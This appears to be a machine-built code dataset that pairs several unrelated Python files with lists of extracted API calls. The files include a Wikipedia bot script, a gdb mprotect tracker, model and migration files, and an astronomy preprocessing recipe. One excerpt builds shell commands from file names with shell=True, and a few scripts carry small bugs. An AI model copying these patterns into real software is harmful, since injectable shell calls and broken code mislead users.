[((1261, 1302), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'delete': '(False)'}), '(delete=False)\n', (1288, 1302), False, 'import tempfile\n'), ((4904, 5020), 'subprocess.Popen', 'subprocess.Popen', (['("samtools view -H \'%s\'" % bamfile)'], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), '("samtools view -H \'%s\'" % bamfile, shell=True, stdout=\n subprocess.PIPE, stderr=subprocess.PIPE)\n', (4920, 5020), False, 'import subprocess\n'), ((1369, 1495), 'subprocess.Popen', 'subprocess.Popen', (['("vcfhdr2json \'%s\' \'%s\'" % (vcfname, tf.name))'], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), '("vcfhdr2json \'%s\' \'%s\'" % (vcfname, tf.name), shell=True,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n', (1385, 1495), False, 'import subprocess\n'), ((1751, 1769), 'os.unlink', 'os.unlink', (['tf.name'], {}), '(tf.name)\n', (1760, 1769), False, 'import os\n'), ((5454, 5516), 'logging.warn', 'logging.warn', (["('Unable to parse SAM/BAM header line: %s' % line)"], {}), "('Unable to parse SAM/BAM header line: %s' % line)\n", (5466, 5516), False, 'import logging\n')]
|
#!/usr/local/bin/python3
import common
import pywikibot
import wikitextparser as parser
from pywikibot import pagegenerators
GAME_MODE_PROP_ID = 'P404'
TEMPLATE = 'Infobox video game'
def main():
site = pywikibot.Site('en', 'wikipedia')
repo = site.data_repository()
temp = pywikibot.Page(site, TEMPLATE, ns=10)
summary = '([[Wikidata:Requests for permissions/Bot/AmmarBot $|Add maximum capacity]])'
all_pages = temp.getReferences(
follow_redirects = False,
only_template_inclusion=False,
namespaces = [0],
total = 100
)
processPages(all_pages, temp)
def processPages(pages, temp):
def getRedirects(p):
backlinks = p.backlinks(filter_redirects=True)
redirects = list()
for link in backlinks:
redirects.append(link.title(with_ns=False).lower())
return redirects
redirects = getRedirects(temp)
for page in pages:
extractMode(page, redirects)
def extractMode(page, redirects):
templates = page.raw_extracted_templates
for (template, values) in templates:
if template.title() == TEMPLATE or template.title() in redirects:
print(values.get('game_mode'))
if __name__ == '__main__':
main()
|
[
"pywikibot.Site",
"pywikibot.Page"
] |
[((210, 243), 'pywikibot.Site', 'pywikibot.Site', (['"""en"""', '"""wikipedia"""'], {}), "('en', 'wikipedia')\n", (224, 243), False, 'import pywikibot\n'), ((289, 326), 'pywikibot.Page', 'pywikibot.Page', (['site', 'TEMPLATE'], {'ns': '(10)'}), '(site, TEMPLATE, ns=10)\n', (303, 326), False, 'import pywikibot\n')]
|
import gdb
import math
import tempfile
class myst_mprotect_tracker(gdb.Breakpoint):
def __init__(self):
#super(myst_mprotect_tracker, self).__init__('myst_mprotect_ocall', internal=True)
#self.bp = gdb.Breakpoint.__init__(self,'exec.c:637', internal=True)
#self.bp = gdb.Breakpoint.__init__(self,'_mprotect', internal=True)
super(myst_mprotect_tracker, self).__init__('_mprotect', internal=False)
self.calls = []
self.bt_spec = []
self.breaks = []
def stop(self):
addr = int(gdb.parse_and_eval('(uint64_t)addr'))
length = int(gdb.parse_and_eval('(uint64_t)len'))
prot = int(gdb.parse_and_eval('(int)prot'))
thread = int(gdb.parse_and_eval('$_thread'))
bt = None
index = len(self.calls) + 1
if self.bt_spec:
frames = self.bt_spec[0]
start_index = self.bt_spec[1]
end_index = self.bt_spec[2]
if index >= start_index and index <= end_index:
bt = gdb.execute('bt %d' % frames, False, True)
self.calls.append((addr, length, prot, bt, thread))
if index in self.breaks:
print("myst-prot: breaking at call %d" % index)
return True
return False
def do_command(self, arg0, *args):
if arg0 == "-bt":
self.set_bt_spec(*args)
elif arg0 == "-b":
self.add_breaks(*args)
else:
self.get_prot(arg0, *args)
def set_bt_spec(self, frames=1000, start_index=1, end_index=pow(2,32)):
self.bt_spec = (frames, start_index, end_index)
def add_breaks(self, *args):
for a in args:
self.breaks.append(int(a))
def get_prot(self, addr_str, get_all=None):
addr = int(gdb.parse_and_eval(addr_str))
print('address %s = 0x%x' % (addr_str, addr))
index = len(self.calls) + 1
for c in reversed(self.calls):
index -= 1
start = c[0]
length = c[1]
end = start + length
end = math.ceil(end/4096) * 4096
prot = c[2]
bt = c[3]
thread = c[4]
if addr >= start and addr < end:
print('matching mprotect call %d : thread %d, start=0x%x, adjusted end=0x%x, prot=%d, length = %d' %
(index, thread, start, end, prot, length))
if bt:
print(bt)
if not get_all:
break
mprotect_tracker = None
command = """
define myst-prot
if $argc == 4
python mprotect_tracker.do_command("$arg0", $arg1, $arg2, $arg3)
end
if $argc == 3
python mprotect_tracker.do_command("$arg0", $arg1, $arg2)
end
if $argc == 2
python mprotect_tracker.do_command("$arg0", $arg1)
end
if $argc == 1
python mprotect_tracker.do_command("$arg0")
end
end
"""
if __name__ == "__main__":
gdb.events.exited.connect(exit_handler)
mprotect_tracker = myst_mprotect_tracker()
with tempfile.NamedTemporaryFile('w') as f:
f.write(command)
f.flush()
gdb.execute('source %s' % f.name)
def exit_handler(event):
global mprotect_tracker
mprotect_tracker = None
|
[
"tempfile.NamedTemporaryFile",
"gdb.execute",
"math.ceil",
"gdb.events.exited.connect",
"gdb.parse_and_eval"
] |
[((2936, 2975), 'gdb.events.exited.connect', 'gdb.events.exited.connect', (['exit_handler'], {}), '(exit_handler)\n', (2961, 2975), False, 'import gdb\n'), ((3034, 3066), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (3061, 3066), False, 'import tempfile\n'), ((3124, 3157), 'gdb.execute', 'gdb.execute', (["('source %s' % f.name)"], {}), "('source %s' % f.name)\n", (3135, 3157), False, 'import gdb\n'), ((549, 585), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['"""(uint64_t)addr"""'], {}), "('(uint64_t)addr')\n", (567, 585), False, 'import gdb\n'), ((608, 643), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['"""(uint64_t)len"""'], {}), "('(uint64_t)len')\n", (626, 643), False, 'import gdb\n'), ((664, 695), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['"""(int)prot"""'], {}), "('(int)prot')\n", (682, 695), False, 'import gdb\n'), ((718, 748), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['"""$_thread"""'], {}), "('$_thread')\n", (736, 748), False, 'import gdb\n'), ((1787, 1815), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['addr_str'], {}), '(addr_str)\n', (1805, 1815), False, 'import gdb\n'), ((1030, 1072), 'gdb.execute', 'gdb.execute', (["('bt %d' % frames)", '(False)', '(True)'], {}), "('bt %d' % frames, False, True)\n", (1041, 1072), False, 'import gdb\n'), ((2071, 2092), 'math.ceil', 'math.ceil', (['(end / 4096)'], {}), '(end / 4096)\n', (2080, 2092), False, 'import math\n')]
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from sample.version import __version__
with open('README.rst') as f:
readme = f.read()
with open('LICENSE') as f:
license = f.read()
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(
name='sample',
version=__version__,
description='Sample package',
long_description=readme,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/azafred/sample',
license=license,
packages=find_packages(exclude=('tests', 'docs')),
install_requires=required,
tests_require=['nose', 'testfixtures', 'mock'],
test_suite="nose.collector",
entry_points={
'console_scripts': [
'sample = sample.main:main'
]
},
classifiers=[
'Topic :: Utilities',
'Programming Language :: Python',
'Operating System :: MacOS'
]
)
|
[
"setuptools.find_packages"
] |
[((528, 568), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "('tests', 'docs')"}), "(exclude=('tests', 'docs'))\n", (541, 568), False, 'from setuptools import setup, find_packages\n')]
|
# -*- coding: utf-8 -*-
"""
存储结果
"""
from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text
from sqlalchemy.dialects.postgresql import JSONB
from webs.api.models import db
class Result(db.Model):
__tablename__ = 'results'
id = Column(BigInteger, primary_key=True, autoincrement=True)
subtask_id = Column(Integer, nullable=False, index=True) # 所属子任务任务id
url_id = Column(Integer, nullable=False, index=True) # url id
url_address = Column(String(1024), nullable=False) # url 地址
http_code = Column(Integer) # 网站状态码
title = Column(Text) # 网站标题
content = Column(Text) # 网站内容
text = Column(Text) # 网页正文
current_url = Column(String(1024)) # 网站最后相应的地址
redirect_chain = Column(JSONB) # 重定向链接
response_headers = Column(JSONB) # response headers
har_uuid = Column(String(128)) # 网站交互过程
screenshot_id = Column(String(128)) # 截图Id
cookies = Column(JSONB) # cookies
finished_at = Column(TIMESTAMP) # 完成时间
wappalyzer_results = Column(JSONB) # 网站指纹
callback_failure_msg = Column(Text) # 回调错误信息
favicon_md5 = Column(String(50)) # 网站图标hash值
favicon_link = Column(String(1024)) # 网站图标链接
response_time = Column(Integer) # 网站响应时间
load_complete_time = Column(Integer) # 页面加载完成时间
charset = Column(String(256)) # 网站编码
create_time = Column(TIMESTAMP, server_default=func.now(), index=True)
update_time = Column(TIMESTAMP, server_default=func.now(), onupdate=func.now(), index=True)
def __repr__(self):
return f'<Result-{self.id}>'
def as_dict(self):
from webs.api.models.db_proxy import task_model_proxy
task_obj = task_model_proxy.query_task_obj_by_subtask(self.subtask_id)
return {
'result_id': self.id,
'subtask_id': self.subtask_id,
'task_id': task_obj.id if task_obj else None,
'customer_id': task_obj.customer_id if task_obj else None,
'url_id': self.url_id,
'url_address': self.url_address,
'http_code': self.http_code,
'title': self.title,
'content': self.content,
'text': self.text,
'current_url': self.current_url,
'redirect_chain': self.redirect_chain,
'response_headers': self.response_headers,
'har_uuid': self.har_uuid,
'screenshot_id': self.screenshot_id,
'cookies': self.cookies,
'favicon_md5': self.favicon_md5,
'favicon_link': self.favicon_link,
'wappalyzer_results': self.wappalyzer_results,
'response_time': self.response_time,
'load_complete_time': self.load_complete_time,
'charset': self.charset,
'finished_at': self.finished_at.strftime("%Y-%m-%d %H:%M:%S")
}
|
[
"sqlalchemy.String",
"sqlalchemy.func.now",
"webs.api.models.db_proxy.task_model_proxy.query_task_obj_by_subtask",
"sqlalchemy.Column"
] |
[((268, 324), 'sqlalchemy.Column', 'Column', (['BigInteger'], {'primary_key': '(True)', 'autoincrement': '(True)'}), '(BigInteger, primary_key=True, autoincrement=True)\n', (274, 324), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((342, 385), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)', 'index': '(True)'}), '(Integer, nullable=False, index=True)\n', (348, 385), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((412, 455), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)', 'index': '(True)'}), '(Integer, nullable=False, index=True)\n', (418, 455), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((547, 562), 'sqlalchemy.Column', 'Column', (['Integer'], {}), '(Integer)\n', (553, 562), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((584, 596), 'sqlalchemy.Column', 'Column', (['Text'], {}), '(Text)\n', (590, 596), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((619, 631), 'sqlalchemy.Column', 'Column', (['Text'], {}), '(Text)\n', (625, 631), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((651, 663), 'sqlalchemy.Column', 'Column', (['Text'], {}), '(Text)\n', (657, 663), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((745, 758), 'sqlalchemy.Column', 'Column', (['JSONB'], {}), '(JSONB)\n', (751, 758), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((791, 804), 'sqlalchemy.Column', 'Column', (['JSONB'], {}), '(JSONB)\n', (797, 804), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((932, 945), 'sqlalchemy.Column', 'Column', (['JSONB'], {}), '(JSONB)\n', (938, 945), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((975, 992), 'sqlalchemy.Column', 'Column', (['TIMESTAMP'], {}), '(TIMESTAMP)\n', (981, 992), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1026, 1039), 'sqlalchemy.Column', 'Column', (['JSONB'], {}), '(JSONB)\n', (1032, 1039), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1075, 1087), 'sqlalchemy.Column', 'Column', (['Text'], {}), '(Text)\n', (1081, 1087), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1218, 1233), 'sqlalchemy.Column', 'Column', (['Integer'], {}), '(Integer)\n', (1224, 1233), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1269, 1284), 'sqlalchemy.Column', 'Column', (['Integer'], {}), '(Integer)\n', (1275, 1284), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((491, 503), 'sqlalchemy.String', 'String', (['(1024)'], {}), '(1024)\n', (497, 503), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((697, 709), 'sqlalchemy.String', 'String', (['(1024)'], {}), '(1024)\n', (703, 709), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((847, 858), 'sqlalchemy.String', 'String', (['(128)'], {}), '(128)\n', (853, 858), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((897, 908), 'sqlalchemy.String', 'String', (['(128)'], {}), '(128)\n', (903, 908), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1123, 1133), 'sqlalchemy.String', 'String', (['(50)'], {}), '(50)\n', (1129, 1133), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1174, 1186), 'sqlalchemy.String', 'String', (['(1024)'], {}), '(1024)\n', (1180, 1186), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1318, 1329), 'sqlalchemy.String', 'String', (['(256)'], {}), '(256)\n', (1324, 1329), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1678, 1737), 'webs.api.models.db_proxy.task_model_proxy.query_task_obj_by_subtask', 'task_model_proxy.query_task_obj_by_subtask', (['self.subtask_id'], {}), '(self.subtask_id)\n', (1720, 1737), False, 'from webs.api.models.db_proxy import task_model_proxy\n'), ((1391, 1401), 'sqlalchemy.func.now', 'func.now', ([], {}), '()\n', (1399, 1401), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1466, 1476), 'sqlalchemy.func.now', 'func.now', ([], {}), '()\n', (1474, 1476), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n'), ((1487, 1497), 'sqlalchemy.func.now', 'func.now', ([], {}), '()\n', (1495, 1497), False, 'from sqlalchemy import Column, BigInteger, String, TIMESTAMP, func, Integer, Text\n')]
|
# Generated by Django 3.0.7 on 2021-02-05 09:15
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('panel', '0003_auto_20210205_0955'),
]
operations = [
migrations.CreateModel(
name='Log',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(max_length=4)),
('time', models.DateTimeField(default=django.utils.timezone.now)),
('monitor_object', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='panel.MonitorObject')),
],
),
]
|
[
"django.db.models.CharField",
"django.db.models.DateTimeField",
"django.db.models.ForeignKey",
"django.db.models.AutoField"
] |
[((387, 480), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (403, 480), False, 'from django.db import migrations, models\n'), ((506, 536), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(4)'}), '(max_length=4)\n', (522, 536), False, 'from django.db import migrations, models\n'), ((564, 619), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now'}), '(default=django.utils.timezone.now)\n', (584, 619), False, 'from django.db import migrations, models\n'), ((657, 750), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""panel.MonitorObject"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'panel.MonitorObject')\n", (674, 750), False, 'from django.db import migrations, models\n')]
|
import os
import importlib
import pooch
from pooch import Unzip
from ._spooch import SPATIALPOOCH as _GOODBOY
###########################################################################
allowed_formats = {
"pandas" : False,
"numpy" : False,
"string" : True,
"sedf" : False
}
###########################################################################
if importlib.util.find_spec('numpy') is not None:
import numpy as np
allowed_formats['numpy'] = True
if importlib.util.find_spec('pandas') is not None:
import pandas as pd
allowed_formats['pandas'] = True
if importlib.util.find_spec('arcgis') is not None:
from arcgis.features import GeoAccessor, GeoSeriesAccessor
allowed_formats['arcgis'] = True
###########################################################################
#--------------------------------------------------------------------------
def _fetch(data, f, **kwargs):
"""gets the data in the proper format"""
data = _GOODBOY.fetch(fname=data, processor=Unzip())
if f is None:
f = 'string'
if str(f) == 'string':
return data
elif str(f) == 'arcgis' and allowed_formats['arcgis']:
for f in data:
if str(f).lower().endswith(".shp"):
return pd.DataFrame.spatial.from_featureclass(f)
elif str(f).lower().endswith('.gdb') and 'dataset' in kwargs:
fc = os.path.join(f, kwargs['dataset'])
return pd.DataFrame.spatial.from_featureclass(f)
return data
#--------------------------------------------------------------------------
def fetch_beach_access_data(f=None):
"""gets the data in the proper format"""
data = _fetch(data="vector/Public_Access_Information.zip", f=f)
return data
#--------------------------------------------------------------------------
def fetch_shipping_lanes_data(f=None):
"""gets the data in the proper format"""
return _fetch(data="vector/Shipping_Lanes.zip", f=f)
#--------------------------------------------------------------------------
def fetch_crime_shp_data(f=None):
"""gets the data in the proper format"""
return _fetch(data="vector/Crime.zip", f=f)
#--------------------------------------------------------------------------
def fetch_family_resource_centers_data(f=None):
"""gets the data in the proper format"""
return _fetch(data="vector/Family_Resource_Centers.zip", f=f)
|
[
"importlib.util.find_spec",
"pandas.DataFrame.spatial.from_featureclass",
"pooch.Unzip",
"os.path.join"
] |
[((373, 406), 'importlib.util.find_spec', 'importlib.util.find_spec', (['"""numpy"""'], {}), "('numpy')\n", (397, 406), False, 'import importlib\n'), ((482, 516), 'importlib.util.find_spec', 'importlib.util.find_spec', (['"""pandas"""'], {}), "('pandas')\n", (506, 516), False, 'import importlib\n'), ((594, 628), 'importlib.util.find_spec', 'importlib.util.find_spec', (['"""arcgis"""'], {}), "('arcgis')\n", (618, 628), False, 'import importlib\n'), ((1018, 1025), 'pooch.Unzip', 'Unzip', ([], {}), '()\n', (1023, 1025), False, 'from pooch import Unzip\n'), ((1266, 1307), 'pandas.DataFrame.spatial.from_featureclass', 'pd.DataFrame.spatial.from_featureclass', (['f'], {}), '(f)\n', (1304, 1307), True, 'import pandas as pd\n'), ((1403, 1437), 'os.path.join', 'os.path.join', (['f', "kwargs['dataset']"], {}), "(f, kwargs['dataset'])\n", (1415, 1437), False, 'import os\n'), ((1461, 1502), 'pandas.DataFrame.spatial.from_featureclass', 'pd.DataFrame.spatial.from_featureclass', (['f'], {}), '(f)\n', (1499, 1502), True, 'import pandas as pd\n')]
|
import sys
import os
import unittest
from botstory.botclass import BotClass
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
class TestChatbot(unittest.TestCase):
def test_chatbot(self):
chatbot = BotClass()
# Check whether the bot is able to respond to a simple phrase from conversations.json
self.assertEqual(chatbot.process_query("Thank you."), "You're welcome.")
self.assertEqual(chatbot.process_query("thank you"), "You're welcome.")
|
[
"os.path.dirname",
"botstory.botclass.BotClass"
] |
[((245, 255), 'botstory.botclass.BotClass', 'BotClass', ([], {}), '()\n', (253, 255), False, 'from botstory.botclass import BotClass\n'), ((125, 150), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (140, 150), False, 'import os\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# CODE DESCRIPTION HERE
Created on 2019-03-05 16:38
@author: ncook
Version 0.0.1
"""
import numpy as np
import os
from apero import core
from apero import lang
from apero.core import constants
from apero.science import preprocessing as pp
from apero.io import drs_image
from apero.io import drs_fits
from apero.core.instruments.spirou import file_definitions
# =============================================================================
# Define variables
# =============================================================================
__NAME__ = 'cal_preprocess_spirou.py'
__INSTRUMENT__ = 'SPIROU'
# Get constants
Constants = constants.load(__INSTRUMENT__)
# Get version and author
__version__ = Constants['DRS_VERSION']
__author__ = Constants['AUTHORS']
__date__ = Constants['DRS_DATE']
__release__ = Constants['DRS_RELEASE']
# Get Logging function
WLOG = core.wlog
# Get the text types
TextEntry = lang.drs_text.TextEntry
# Raw prefix
RAW_PREFIX = file_definitions.raw_prefix
# =============================================================================
# Define functions
# =============================================================================
# All recipe code goes in _main
# Only change the following from here:
# 1) function calls (i.e. main(arg1, arg2, **kwargs)
# 2) fkwargs (i.e. fkwargs=dict(arg1=arg1, arg2=arg2, **kwargs)
# 3) config_main outputs value (i.e. None, pp, reduced)
# Everything else is controlled from recipe_definition
def main(directory=None, files=None, **kwargs):
"""
Main function for cal_preprocess_spirou.py
:param directory: string, the night name sub-directory
:param files: list of strings or string, the list of files to process
:param kwargs: any additional keywords
:type directory: str
:type files: list[str]
:keyword debug: int, debug level (0 for None)
:returns: dictionary of the local space
:rtype: dict
"""
# assign function calls (must add positional)
fkwargs = dict(directory=directory, files=files, **kwargs)
# ----------------------------------------------------------------------
# deal with command line inputs / function call inputs
recipe, params = core.setup(__NAME__, __INSTRUMENT__, fkwargs)
# solid debug mode option
if kwargs.get('DEBUG0000', False):
return recipe, params
# ----------------------------------------------------------------------
# run main bulk of code (catching all errors)
llmain, success = core.run(__main__, recipe, params)
# ----------------------------------------------------------------------
# End Message
# ----------------------------------------------------------------------
return core.end_main(params, llmain, recipe, success, outputs='None')
def __main__(recipe, params):
# ----------------------------------------------------------------------
# Main Code
# ----------------------------------------------------------------------
# Get hot pixels for corruption check
hotpixels = pp.get_hot_pixels(params)
# get skip parmaeter
skip = params['SKIP_DONE_PP']
# ----------------------------------------------------------------------
# Loop around input files
# ----------------------------------------------------------------------
# get files
infiles = params['INPUTS']['FILES'][1]
# Number of files
num_files = len(params['INPUTS']['FILES'][1])
# storage for output files
output_names = []
# loop around number of files
for it in range(num_files):
# ------------------------------------------------------------------
# add level to recipe log
log1 = recipe.log.add_level(params, 'num', it)
# ------------------------------------------------------------------
# print file iteration progress
core.file_processing_update(params, it, num_files)
# ge this iterations file
file_instance = infiles[it]
# ------------------------------------------------------------------
# Fix the spirou header
# ------------------------------------------------------------------
# certain keys may not be in some spirou files
file_instance = drs_fits.fix_header(params, recipe, file_instance)
# ------------------------------------------------------------------
# identification of file drs type
# ------------------------------------------------------------------
# identify this iterations file type
cond, infile = pp.drs_infile_id(params, recipe, file_instance)
# ------------------------------------------------------------------
# if it wasn't found skip this file, if it was print a message
if cond:
eargs = [infile.name]
WLOG(params, 'info', TextEntry('40-010-00001', args=eargs))
else:
eargs = [infile.filename]
WLOG(params, 'info', TextEntry('40-010-00002', args=eargs))
continue
# get data from file instance
image = np.array(infile.data)
# ------------------------------------------------------------------
# Get out file and check skip
# ------------------------------------------------------------------
# get the output drs file
oargs = [params, recipe, infile, recipe.outputs['PP_FILE'], RAW_PREFIX]
found, outfile = pp.drs_outfile_id(*oargs)
# construct out filename
outfile.construct_filename(params, infile=infile)
# if we didn't find the output file we should log this error
if not found:
eargs = [outfile.name]
WLOG(params, 'error', TextEntry('00-010-00003', args=eargs))
if skip:
if os.path.exists(outfile.filename):
wargs = [infile.filename]
WLOG(params, 'info', TextEntry('40-010-00012', args=wargs))
continue
# ----------------------------------------------------------------------
# Check for pixel shift and/or corrupted files
# ----------------------------------------------------------------------
# storage
snr_hotpix, rms_list = [], []
# do this iteratively as if there is a shift need to re-workout QC
for iteration in range(2):
# get pass condition
cout = pp.test_for_corrupt_files(params, image, hotpixels)
snr_hotpix, rms_list = cout[0], cout[1]
shiftdx, shiftdy = cout[2], cout[3]
# use dx/dy to shift the image back to where the engineering flat
# is located
if shiftdx != 0 or shiftdy != 0:
# log process
wmsg = TextEntry('40-010-00013', args=[shiftdx, shiftdy])
WLOG(params, '', wmsg)
# shift image
image = np.roll(image, [shiftdy], axis=0)
image = np.roll(image, [shiftdx], axis=1)
# work out QC here
qargs = [snr_hotpix, infile, rms_list]
qc_params, passed = pp.quality_control(params, *qargs, log=False)
# if passed break
if passed:
break
# ------------------------------------------------------------------
# Quality control to check for corrupt files
# ------------------------------------------------------------------
# re-calculate qc
qargs = [snr_hotpix, infile, rms_list]
qc_params, passed = pp.quality_control(params, *qargs, log=True)
# update recipe log
log1.add_qc(params, qc_params, passed)
if not passed:
# end log here
log1.end(params)
# go to next iteration
continue
# ------------------------------------------------------------------
# correct image
# ------------------------------------------------------------------
# correct for the top and bottom reference pixels
WLOG(params, '', TextEntry('40-010-00003'))
image = pp.correct_top_bottom(params, image)
# correct by a median filter from the dark amplifiers
WLOG(params, '', TextEntry('40-010-00004'))
image = pp.median_filter_dark_amps(params, image)
# correct for the 1/f noise
WLOG(params, '', TextEntry('40-010-00005'))
image = pp.median_one_over_f_noise(params, image)
# ------------------------------------------------------------------
# calculate mid observation time
# ------------------------------------------------------------------
mout = drs_fits.get_mid_obs_time(params, infile.header)
mid_obs_time, mid_obs_method = mout
# ------------------------------------------------------------------
# rotate image
# ------------------------------------------------------------------
# rotation to match HARPS orientation (expected by DRS)
image = drs_image.rotate_image(image, params['RAW_TO_PP_ROTATION'])
# ------------------------------------------------------------------
# Save rotated image
# ------------------------------------------------------------------
# define header keys for output file
# copy keys from input file
outfile.copy_original_keys(infile)
# add version
outfile.add_hkey('KW_PPVERSION', value=params['DRS_VERSION'])
# add dates
outfile.add_hkey('KW_DRS_DATE', value=params['DRS_DATE'])
outfile.add_hkey('KW_DRS_DATE_NOW', value=params['DATE_NOW'])
# add process id
outfile.add_hkey('KW_PID', value=params['PID'])
# add input filename
outfile.add_hkey_1d('KW_INFILE1', values=[infile.basename],
dim1name='infile')
# add qc parameters
outfile.add_qckeys(qc_params)
# add dprtype
outfile.add_hkey('KW_DPRTYPE', value=outfile.name)
# add the shift that was used to correct the image
outfile.add_hkey('KW_PPSHIFTX', value=shiftdx)
outfile.add_hkey('KW_PPSHIFTY', value=shiftdy)
# add mid observation time
outfile.add_hkey('KW_MID_OBS_TIME', value=mid_obs_time.mjd)
outfile.add_hkey('KW_MID_OBSTIME_METHOD', value=mid_obs_method)
# ------------------------------------------------------------------
# copy data
outfile.data = image
# ------------------------------------------------------------------
# log that we are saving rotated image
wargs = [outfile.filename]
WLOG(params, '', TextEntry('40-010-00009', args=wargs))
# ------------------------------------------------------------------
# writefits image to file
outfile.write_file()
# add to output files (for indexing)
recipe.add_output_file(outfile)
# index this file
core.end_main(params, None, recipe, success=True, outputs='pp',
end=False)
# ------------------------------------------------------------------
# append to output storage in p
# ------------------------------------------------------------------
output_names.append(outfile.filename)
# ------------------------------------------------------------------
# update recipe log file
# ------------------------------------------------------------------
log1.end(params)
# ----------------------------------------------------------------------
# End of main code
# ----------------------------------------------------------------------
return core.return_locals(params, dict(locals()))
# =============================================================================
# Start of code
# =============================================================================
if __name__ == "__main__":
# run main with no arguments (get from command line - sys.argv)
ll = main()
# =============================================================================
# End of code
# =============================================================================
|
[
"apero.core.setup",
"apero.science.preprocessing.median_one_over_f_noise",
"apero.science.preprocessing.correct_top_bottom",
"apero.core.run",
"apero.science.preprocessing.quality_control",
"apero.science.preprocessing.get_hot_pixels",
"apero.io.drs_image.rotate_image",
"os.path.exists",
"apero.io.drs_fits.fix_header",
"apero.core.file_processing_update",
"apero.science.preprocessing.median_filter_dark_amps",
"numpy.roll",
"apero.science.preprocessing.drs_infile_id",
"apero.core.constants.load",
"apero.io.drs_fits.get_mid_obs_time",
"apero.science.preprocessing.test_for_corrupt_files",
"apero.science.preprocessing.drs_outfile_id",
"apero.core.end_main",
"numpy.array"
] |
[((686, 716), 'apero.core.constants.load', 'constants.load', (['__INSTRUMENT__'], {}), '(__INSTRUMENT__)\n', (700, 716), False, 'from apero.core import constants\n'), ((2269, 2314), 'apero.core.setup', 'core.setup', (['__NAME__', '__INSTRUMENT__', 'fkwargs'], {}), '(__NAME__, __INSTRUMENT__, fkwargs)\n', (2279, 2314), False, 'from apero import core\n'), ((2563, 2597), 'apero.core.run', 'core.run', (['__main__', 'recipe', 'params'], {}), '(__main__, recipe, params)\n', (2571, 2597), False, 'from apero import core\n'), ((2781, 2843), 'apero.core.end_main', 'core.end_main', (['params', 'llmain', 'recipe', 'success'], {'outputs': '"""None"""'}), "(params, llmain, recipe, success, outputs='None')\n", (2794, 2843), False, 'from apero import core\n'), ((3105, 3130), 'apero.science.preprocessing.get_hot_pixels', 'pp.get_hot_pixels', (['params'], {}), '(params)\n', (3122, 3130), True, 'from apero.science import preprocessing as pp\n'), ((3917, 3967), 'apero.core.file_processing_update', 'core.file_processing_update', (['params', 'it', 'num_files'], {}), '(params, it, num_files)\n', (3944, 3967), False, 'from apero import core\n'), ((4303, 4353), 